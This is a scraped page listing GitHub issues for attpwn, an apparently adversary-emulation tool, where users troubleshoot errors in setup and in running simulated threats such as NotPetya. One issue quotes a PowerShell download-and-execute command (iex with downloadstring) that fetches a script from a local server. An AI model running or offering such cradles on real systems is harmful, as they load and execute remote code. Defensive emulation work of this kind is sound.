Git Product home page Git Product logo

attpwn's People

Contributors

ideaslocas avatar luisedev avatar pablogonzalezpe avatar pablogonzalezperez avatar robertogomezp avatar skuller99dev avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

attpwn's Issues

PowerShell Errors when running threat (non-standard dash "-" found in source code)

When Running NotPetya on Win10 Pro, I get errors in PowerShell window. Tasks error or remain pending after code has run. If I replace the non-standard dash "-" character in the source code (invoke-scheduledTask and invoke-wsreset, this fixes the error).
sed -i s/โ€“/-/g functions/invoke-scheduleTask
sed -i s/โ€“/-/g functions/invoke-wsreset

image

image

image

image

Warriors configuration Powershell error

Hi, I'm trying to configure my first warrior but I received the following Powershell error, can you please help me?

PS C:\Windows\system32> powershell.exe -C "iex(new-object net.webclient).downloadstring('http://192.168.192.132:5000/consola');consola"
Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:1

  • iex(new-object net.webclient).downloadstring('http://192.168.192.132: ...
  •   + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
      + FullyQualifiedErrorId : WebException
    
    

consola : The term 'consola' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:85

tesresources

When installing requirements on Virtualenv, fails with:
ERROR: launchpadlib 1.10.13 requires testresources, which is not installed.

Easy workaround is to install python3-testresources from dist packages (apt install python3-testresources) or with pip3, "pip3 install testresources".

jinja2.exceptions.TemplateNotFound

When I run py app.py it starts the page but it shows an error ( jinja2.exceptions.TemplateNotFound: index.html ).

I installed all the requirements from the file.

I have tried it again but the same error comes.

New-ScheduledTaskAction : Cannot connect to CIM server.

Errors when running NotPetya threat on Windows 10. Warrior was created in administrative command shell prompt.

New-ScheduledTaskAction : Cannot connect to CIM server. Access to a CIM resource was not available to the client.

image

image

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.